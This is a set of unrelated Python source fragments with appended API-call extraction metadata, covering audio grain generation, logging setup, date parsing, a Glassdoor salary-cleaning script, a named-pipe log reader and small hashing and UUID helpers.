    if cog_audio_format in [CogAudioFormat.S16_PLANES,
                            CogAudioFormat.S24_PLANES,
                            CogAudioFormat.S32_PLANES,
                            CogAudioFormat.FLOAT_PLANES,
                            CogAudioFormat.DOUBLE_PLANES]:
        planes = True
    elif cog_audio_format in [CogAudioFormat.S16_PAIRS,
                              CogAudioFormat.S24_PAIRS,
                              CogAudioFormat.S32_PAIRS,
                              CogAudioFormat.FLOAT_PAIRS,
                              CogAudioFormat.DOUBLE_PAIRS]:
        pairs = True
    elif cog_audio_format in [CogAudioFormat.S16_INTERLEAVED,
                              CogAudioFormat.S24_INTERLEAVED,
                              CogAudioFormat.S32_INTERLEAVED,
                              CogAudioFormat.FLOAT_INTERLEAVED,
                              CogAudioFormat.DOUBLE_INTERLEAVED]:
        interleaved = True
    # One grain per `samples` audio samples gives this grain rate/duration.
    rate = fractions.Fraction(sample_rate, samples)
    duration = 1/rate
    # Template grain; every yielded grain is a deepcopy of this with its
    # timestamps and payload replaced.
    ag = AudioGrain(src_id, flow_id,
                    origin_timestamp=origin_timestamp,
                    cog_audio_format=cog_audio_format,
                    samples=samples,
                    channels=channels,
                    rate=rate,
                    duration=duration,
                    sample_rate=sample_rate)
    origin_timestamp = ag.origin_timestamp
    ots = origin_timestamp
    offs = 0
    count = 0
    def make_samples(offs, samples, channels):
        # Take `samples` consecutive values from the looped source starting
        # at `offs`, replicate them across channels per the layout flags,
        # then pack them into bytes at the chosen depth.
        line = [formatted_sample_data[n % len(formatted_sample_data)] for n in range(offs, offs+samples)]
        if planes:
            line = line * channels
        elif pairs:
            line = [x for x in line for _ in range(0, 2)] * (channels//2)
        elif interleaved:
            line = [x for x in line for _ in range(0, channels)]
        if depth == 16:
            return struct.pack('@' + ('h'*samples*channels), *line)
        elif depth == 24:
            # NOTE(review): '@i'[:3] keeps the low three bytes, which is only
            # a valid 24-bit little-endian encoding on little-endian hosts —
            # confirm this never runs on big-endian platforms.
            return b''.join(struct.pack('@i', x)[:3] for x in line)
        elif depth == 32:
            return struct.pack('@' + ('i'*samples*channels), *line)
        elif depth == 'f':
            return struct.pack('@' + ('f'*samples*channels), *line)
        elif depth == 'd':
            return struct.pack('@' + ('d'*samples*channels), *line)
    # Infinite stream: advance `samples*step` source samples per grain,
    # wrapping the loop offset and moving the timestamps forward to match.
    while True:
        grain = deepcopy(ag)
        grain.origin_timestamp = ots
        grain.sync_timestamp = ots
        if offs not in data_samples:
            data_samples[offs] = make_samples(offs, samples, channels)
        grain.data = bytearray(data_samples[offs][:grain.expected_length])
        yield grain
        offs = (offs + samples*step) % len(formatted_sample_data)
        count += samples*step
        ots = origin_timestamp + TimeOffset.from_count(count, sample_rate, 1)
| [
"mediatimestamp.immutable.Timestamp.get_time",
"deprecated.deprecated",
"mediatimestamp.immutable.TimeOffset.from_count",
"fractions.Fraction",
"struct.pack",
"copy.deepcopy",
"mediatimestamp.immutable.Timestamp"
] | [((2587, 2679), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (2597, 2679), False, 'from deprecated import deprecated\n'), ((3577, 3669), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (3587, 3669), False, 'from deprecated import deprecated\n'), ((4721, 4813), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (4731, 4813), False, 'from deprecated import deprecated\n'), ((8282, 8374), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (8292, 8374), False, 'from deprecated import deprecated\n'), ((8886, 8978), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (8896, 8978), False, 'from deprecated import deprecated\n'), ((9721, 9813), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (9731, 9813), False, 'from deprecated import deprecated\n'), ((10531, 10623), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), 
"(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (10541, 10623), False, 'from deprecated import deprecated\n'), ((2740, 2755), 'fractions.Fraction', 'Fraction', (['(25)', '(1)'], {}), '(25, 1)\n', (2748, 2755), False, 'from fractions import Fraction\n'), ((3763, 3778), 'fractions.Fraction', 'Fraction', (['(25)', '(1)'], {}), '(25, 1)\n', (3771, 3778), False, 'from fractions import Fraction\n'), ((13637, 13677), 'fractions.Fraction', 'fractions.Fraction', (['sample_rate', 'samples'], {}), '(sample_rate, samples)\n', (13655, 13677), False, 'import fractions\n'), ((3361, 3381), 'mediatimestamp.immutable.Timestamp.get_time', 'Timestamp.get_time', ([], {}), '()\n', (3379, 3381), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((4470, 4490), 'mediatimestamp.immutable.Timestamp.get_time', 'Timestamp.get_time', ([], {}), '()\n', (4488, 4490), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((9277, 9297), 'mediatimestamp.immutable.Timestamp.get_time', 'Timestamp.get_time', ([], {}), '()\n', (9295, 9297), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((10113, 10133), 'mediatimestamp.immutable.Timestamp.get_time', 'Timestamp.get_time', ([], {}), '()\n', (10131, 10133), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((15034, 15046), 'copy.deepcopy', 'deepcopy', (['ag'], {}), '(ag)\n', (15042, 15046), False, 'from copy import deepcopy\n'), ((9532, 9543), 'mediatimestamp.immutable.Timestamp', 'Timestamp', ([], {}), '()\n', (9541, 9543), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((10342, 10353), 'mediatimestamp.immutable.Timestamp', 'Timestamp', ([], {}), '()\n', (10351, 10353), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((14574, 14624), 'struct.pack', 'struct.pack', (["('@' + 'h' * samples * channels)", '*line'], {}), "('@' + 'h' * samples * channels, *line)\n", (14585, 14624), False, 
'import struct\n'), ((15456, 15500), 'mediatimestamp.immutable.TimeOffset.from_count', 'TimeOffset.from_count', (['count', 'sample_rate', '(1)'], {}), '(count, sample_rate, 1)\n', (15477, 15500), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((14762, 14812), 'struct.pack', 'struct.pack', (["('@' + 'i' * samples * channels)", '*line'], {}), "('@' + 'i' * samples * channels, *line)\n", (14773, 14812), False, 'import struct\n'), ((14857, 14907), 'struct.pack', 'struct.pack', (["('@' + 'f' * samples * channels)", '*line'], {}), "('@' + 'f' * samples * channels, *line)\n", (14868, 14907), False, 'import struct\n'), ((14677, 14697), 'struct.pack', 'struct.pack', (['"""@i"""', 'x'], {}), "('@i', x)\n", (14688, 14697), False, 'import struct\n'), ((14952, 15002), 'struct.pack', 'struct.pack', (["('@' + 'd' * samples * channels)", '*line'], {}), "('@' + 'd' * samples * channels, *line)\n", (14963, 15002), False, 'import struct\n')] |
"""
_logging module (imdb package).
"""
import logging
# Map human-readable level names onto the numeric stdlib logging levels.
LEVELS = {
    'debug': logging.DEBUG,
    'info': logging.INFO,
    'warn': logging.WARNING,
    'warning': logging.WARNING,
    'error': logging.ERROR,
    'critical': logging.CRITICAL,
}

# Package-wide logger wired to a stream handler with a verbose format
# (timestamp, level, logger name, source location, message).
imdbpyLogger = logging.getLogger('media_browser')
imdbpyStreamHandler = logging.StreamHandler()
imdbpyFormatter = logging.Formatter(
    '%(asctime)s %(levelname)s [%(name)s]'
    ' %(pathname)s:%(lineno)d: %(message)s')
imdbpyStreamHandler.setFormatter(imdbpyFormatter)
imdbpyLogger.addHandler(imdbpyStreamHandler)


def setLevel(level):
    """Set logging level for the main logger.

    ``level`` is a case-insensitive name from :data:`LEVELS`; anything
    unrecognised resets the logger to ``logging.NOTSET``.
    """
    normalized = level.strip().lower()
    imdbpyLogger.setLevel(LEVELS.get(normalized, logging.NOTSET))
    # Announce the change at the newly configured threshold itself.
    imdbpyLogger.log(imdbpyLogger.level,
                     'set logging threshold to "%s"',
                     logging.getLevelName(imdbpyLogger.level))
#imdbpyLogger.setLevel(logging.DEBUG)
# It can be an idea to have a single function to log and warn:
#import warnings
#def log_and_warn(msg, args=None, logger=None, level=None):
# """Log the message and issue a warning."""
# if logger is None:
# logger = imdbpyLogger
# if level is None:
# level = logging.WARNING
# if args is None:
# args = ()
# #warnings.warn(msg % args, stacklevel=0)
# logger.log(level, msg % args)
| [
"logging.getLogger",
"logging.Formatter",
"logging.getLevelName",
"logging.StreamHandler"
] | [((277, 311), 'logging.getLogger', 'logging.getLogger', (['"""media_browser"""'], {}), "('media_browser')\n", (294, 311), False, 'import logging\n'), ((334, 357), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (355, 357), False, 'import logging\n'), ((376, 480), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s %(levelname)s [%(name)s] %(pathname)s:%(lineno)d: %(message)s"""'], {}), "(\n '%(asctime)s %(levelname)s [%(name)s] %(pathname)s:%(lineno)d: %(message)s'\n )\n", (393, 480), False, 'import logging\n'), ((867, 907), 'logging.getLevelName', 'logging.getLevelName', (['imdbpyLogger.level'], {}), '(imdbpyLogger.level)\n', (887, 907), False, 'import logging\n')] |
import datetime
from collections import OrderedDict
def decode_date(string):
    """Decode a date from a command line argument.

    Accepted formats: ``YYYYMMDD``, ``YYYY-MM-DD``,
    ``YYYY-MM-DDTHH:MM:SS`` and ``YYYY-MM-DDTHH:MM:SS.ffffff``.

    Args:
        string: the date string to parse.

    Returns:
        datetime.datetime: the parsed date/time.

    Raises:
        ValueError: if string does not conform to a legal date format.
    """
    date_formats = ('%Y%m%d',
                    '%Y-%m-%d',
                    '%Y-%m-%dT%H:%M:%S',
                    '%Y-%m-%dT%H:%M:%S.%f')
    for date_format in date_formats:
        try:
            return datetime.datetime.strptime(string, date_format)
        except ValueError:
            # Not this format; try the next one.
            continue
    raise ValueError('Invalid format for date: "%s".' % string)
| [
"datetime.datetime.strptime"
] | [((604, 651), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['string', 'date_format'], {}), '(string, date_format)\n', (630, 651), False, 'import datetime\n')] |
# %%
# Clean the scraped Glassdoor jobs data set and persist the result.
import pandas as pd

df = pd.read_csv("glassdoor_jobs.csv")
# Drop rows with no scraped salary estimate (sentinel "-1").
df = df[df["Salary Estimate"] != "-1"]
df

# Salary parsing
# %%
# Strip the trailing "(...)" annotation, then the K / ₹ / comma noise,
# leaving a plain "min-max" range string.
salary = df["Salary Estimate"].apply(lambda x: x.split("(")[0])
minus_Kd = salary.apply(
    lambda x: x.replace("K", "").replace("₹", "").replace(",", ""))
# Split the range into numeric min/max and derive the midpoint.
df["min_salary"] = minus_Kd.apply(lambda x: int(x.split("-")[0]))
df["max_salary"] = minus_Kd.apply(lambda x: int(x.split("-")[1]))
df["average-salary"] = (df.min_salary + df.max_salary) / 2
df["currency"] = "LAKh"
df

# Company name text only
# %%
# The scraper appends the rating on a new line ("Name\n4.2"); keep the name.
df["company_txt"] = df["Company Name"].apply(lambda x: x.split("\n")[0])
df

# State field
# %%
df.Location.value_counts()

# %%
# Drop the Competitors column.  BUG FIX: the positional axis argument
# (df.drop("Competitors", 1)) was deprecated in pandas 1.1 and removed
# in pandas 2.0 -- use the columns= keyword instead.
df = df.drop(columns="Competitors")
df

# Age of company
# %%
# Founded values <= 0 are "unknown" sentinels and are passed through.
df["age"] = df.Founded.apply(lambda x: x if x < 1 else 2020 - x)
df

# Parsing of job description (PYTHON)
# %%
# Flag job descriptions mentioning "analysis" (case-insensitive).
df["analysis"] = df["Job Description"].apply(
    lambda x: 1 if "analysis" in x.lower() else 0)
df.analysis.value_counts()

# %%
df["Job Description"][0]

# %%
df

# %%
# *df cleaned*
df_out = df
df_out

# %%
df_out.to_csv("GL_sal_data_cleaned.csv", index=False)

# %%
# Read back the written file as a sanity check.
pd.read_csv("GL_sal_data_cleaned.csv")
# %%
| [
"pandas.read_csv"
] | [((73, 106), 'pandas.read_csv', 'pd.read_csv', (['"""glassdoor_jobs.csv"""'], {}), "('glassdoor_jobs.csv')\n", (84, 106), True, 'import pandas as pd\n'), ((1931, 1969), 'pandas.read_csv', 'pd.read_csv', (['"""GL_sal_data_cleaned.csv"""'], {}), "('GL_sal_data_cleaned.csv')\n", (1942, 1969), True, 'import pandas as pd\n')] |
# -*- coding: utf-8 -*-
"""
# Class to handle reading of SDK Log Data as a pipe/fifo for
# Windows and Unix, to avoid big log files.
----------------------------------------------------------
"""
import platform
import os
import tempfile
IS_WINDOWS = platform.system().lower() == "windows"
if IS_WINDOWS:
try:
import win32pipe, win32file
except:
print("*** WARNING: PyWin dependencies not found for Windows - Please install via:\n\n pip3 install --user pywin32 \n")
class SDKLogPipeHandler(object):
    """Read SDK log data through a named pipe (Windows) or FIFO (Unix).

    Using a pipe instead of a plain log file avoids an ever-growing file
    on disk.
    """

    def __init__(self, is_windows=True):
        """Set up the pipe path for the current platform.

        Args:
            is_windows: use the Win32 named-pipe API when True, a Unix
                FIFO in a fresh temp directory otherwise.
        """
        super(SDKLogPipeHandler, self).__init__()
        # Do we need Unix/Windows setup?
        self.isWindows = is_windows
        # A default location to create a named pipe.
        # This shall be used instead of writing the SDK Log to a file.
        if self.isWindows:
            self.pipe_name = r'\\.\pipe\UHSDK'
        else:
            tmpdir = tempfile.mkdtemp()
            self.pipe_name = os.path.join(tmpdir, 'myfifo')
        # Handle (Windows) or FIFO path (Unix) once setupNamedPipe() ran.
        self.namedPipe = None
        # Pattern for "[x,y,z] intensity i" lines in the SDK log.
        self.xyzi_regex = r'\[(-?[0-9.]+),(-?[0-9.]+),(-?[0-9.]+)\] intensity (-?[0-9.]+)'
        # Number of bytes to read from SDK Log on Windows
        self.num_bytes = 64*1024

    def setupNamedPipe(self):
        """Create the named pipe (Windows) or FIFO (Unix) if needed."""
        # On Windows, we use the win32pipe module
        if self.isWindows:
            if not self.namedPipe:
                self.namedPipe = win32pipe.CreateNamedPipe(self.pipe_name, win32pipe.PIPE_ACCESS_DUPLEX,
                                          win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_READMODE_MESSAGE | win32pipe.PIPE_WAIT,
                                          win32pipe.PIPE_UNLIMITED_INSTANCES,
                                          self.num_bytes,
                                          self.num_bytes,
                                          0,
                                          None)
        # Else, on Unix systems, use mkfifo
        else:
            if not self.namedPipe:
                try:
                    os.mkfifo(self.pipe_name)
                except OSError:
                    # FIFO already exists (or cannot be created) -- reuse the
                    # path.  BUG FIX: was a bare "except:" swallowing everything.
                    print("EXCEPTION: Pipe for %s exists!" % self.pipe_name)
                # BUG FIX: os.mkfifo() returns None, so the original
                # "self.namedPipe = os.mkfifo(...)" left namedPipe unset and
                # retried the mkfifo on every call.  Record the FIFO path so
                # setup is done exactly once.
                self.namedPipe = self.pipe_name

    # win32pipe, Windows only methods
    def connectToSDKPipe(self):
        """Block until a client connects to the Windows named pipe."""
        win32pipe.ConnectNamedPipe(self.namedPipe, None)

    def getDataFromNamedPipe(self):
        """Read up to num_bytes from the Windows named pipe and return it."""
        data = win32file.ReadFile(self.namedPipe, self.num_bytes)
        return data
| [
"win32file.ReadFile",
"win32pipe.ConnectNamedPipe",
"os.path.join",
"win32pipe.CreateNamedPipe",
"platform.system",
"tempfile.mkdtemp",
"os.mkfifo"
] | [((2123, 2171), 'win32pipe.ConnectNamedPipe', 'win32pipe.ConnectNamedPipe', (['self.namedPipe', 'None'], {}), '(self.namedPipe, None)\n', (2149, 2171), False, 'import win32pipe, win32file\n'), ((2224, 2274), 'win32file.ReadFile', 'win32file.ReadFile', (['self.namedPipe', 'self.num_bytes'], {}), '(self.namedPipe, self.num_bytes)\n', (2242, 2274), False, 'import win32pipe, win32file\n'), ((253, 270), 'platform.system', 'platform.system', ([], {}), '()\n', (268, 270), False, 'import platform\n'), ((936, 954), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (952, 954), False, 'import tempfile\n'), ((984, 1014), 'os.path.join', 'os.path.join', (['tmpdir', '"""myfifo"""'], {}), "(tmpdir, 'myfifo')\n", (996, 1014), False, 'import os\n'), ((1405, 1651), 'win32pipe.CreateNamedPipe', 'win32pipe.CreateNamedPipe', (['self.pipe_name', 'win32pipe.PIPE_ACCESS_DUPLEX', '(win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_READMODE_MESSAGE | win32pipe.\n PIPE_WAIT)', 'win32pipe.PIPE_UNLIMITED_INSTANCES', 'self.num_bytes', 'self.num_bytes', '(0)', 'None'], {}), '(self.pipe_name, win32pipe.PIPE_ACCESS_DUPLEX, \n win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_READMODE_MESSAGE |\n win32pipe.PIPE_WAIT, win32pipe.PIPE_UNLIMITED_INSTANCES, self.num_bytes,\n self.num_bytes, 0, None)\n', (1430, 1651), False, 'import win32pipe, win32file\n'), ((1912, 1937), 'os.mkfifo', 'os.mkfifo', (['self.pipe_name'], {}), '(self.pipe_name)\n', (1921, 1937), False, 'import os\n')] |
import time
import uuid
import base64
import hashlib
def millis():
    """Return the current wall-clock time in whole milliseconds."""
    seconds = time.time()
    return int(round(seconds * 1000))
def timestamp():
    """Return the current Unix time as an integer number of seconds."""
    now = time.time()
    return int(now)
def base64_encode(s):
    """Base64-encode a text string and return the result as text."""
    raw = s.encode('utf-8')
    return base64.b64encode(raw).decode('utf-8')
def base64_decode(b):
    """Decode a base64 string back into a UTF-8 text string."""
    raw = base64.b64decode(b)
    return raw.decode('utf-8')
def generate_uuid():
    """Return a fresh random UUID (version 4) as a string."""
    new_id = uuid.uuid4()
    return str(new_id)
def generate_sha1(text):
    """Return the hex SHA-1 digest of a UTF-8 encoded text string."""
    digest = hashlib.sha1(text.encode('utf-8'))
    return digest.hexdigest()
| [
"hashlib.sha1",
"time.time",
"base64.b64decode",
"uuid.uuid4"
] | [((413, 427), 'hashlib.sha1', 'hashlib.sha1', ([], {}), '()\n', (425, 427), False, 'import hashlib\n'), ((147, 158), 'time.time', 'time.time', ([], {}), '()\n', (156, 158), False, 'import time\n'), ((356, 368), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (366, 368), False, 'import uuid\n'), ((282, 301), 'base64.b64decode', 'base64.b64decode', (['b'], {}), '(b)\n', (298, 301), False, 'import base64\n'), ((92, 103), 'time.time', 'time.time', ([], {}), '()\n', (101, 103), False, 'import time\n')] |